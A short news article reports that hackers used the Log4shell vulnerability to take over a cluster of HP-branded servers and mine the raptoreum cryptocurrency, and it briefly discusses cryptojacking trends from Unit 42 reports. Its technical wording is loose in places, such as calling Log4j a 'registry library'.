A group of HP-branded servers were recently compromised by hackers and were used for remotely mining a cryptocurrency named raptoreum. Due to this hack, the compromised group of HP machines ended up becoming the biggest contributor to the cryptocurrency’s total mining pool, which enabled hackers to rake in about $110,000. A report indicates that the crypto tokens were mined between December 9th and December 17th. Hackers had attacked the cluster of HP servers that had been working for an undisclosed company and its hardware was repurposed for mining cryptocurrency. The coin that hackers chose named raptoreum in the top 1,000 coins by market capitalization.
The cryptocurrency uses an algorithm known as Ghostrider, which is a blend of PoW (proof-of-work) and PoS (proof-of-stake) consensus algorithms. On December 9th, the server cluster had started mining raptoreum and had provided more hash power at that time than all the other parties that were on the Raptoreum blockchain. This had enabled the attackers to rake in raptoreum valued at more than $110,000. On December 17th, the server cluster had disappeared from the network, which meant that the threat might have been detected and then patched for elimination. A recently discovered vulnerability named as Log4shell was used in the attack, which enables attackers to remotely gain control of a system.
A registry library called Log4j is used by Log4shell, which is widely used in Apache-based systems. The vulnerability had been identified in early December and it had been leveraged in this case for passing the execution of a crypto mining software. Its discoverers had classified the vulnerability as critical because its utilization is extremely common, even when it comes to huge operations, such as IBM and Microsoft. Even though some of the implementations of the software have been patched, investigators are still looking for new ways they can use for leveraging it.
Recently, it was also discovered that the software is also susceptible to local attacks, which means that the servers don’t have to be connected to the internet for executing codes remotely. In this first half of the year, the number of cryptojacking attacks have reduced for the first time since 2018. These details were provided is a report issued by a security consulting company known as Unit 42. The title of the report was ‘Cloud Thread Report’. However, the company discovered in a follow-up report that almost 63% of the third-party code templates that were used for building cloud infrastructure comprised of insecure configurations.
This meant that they could also lose control of the hardware and this makes them very risky. Cryptojacking is certainly not a new concept and has wreaked a lot of havoc in the crypto space. Many people and systems have suffered from it over the years, but it appears that it might be slowing down, as people have become more diligent. Nonetheless, this latest incident involving HP-branded servers indicates that quick action needs to be taken when a vulnerability is discovered, or things could get worse very quickly even for some big companies.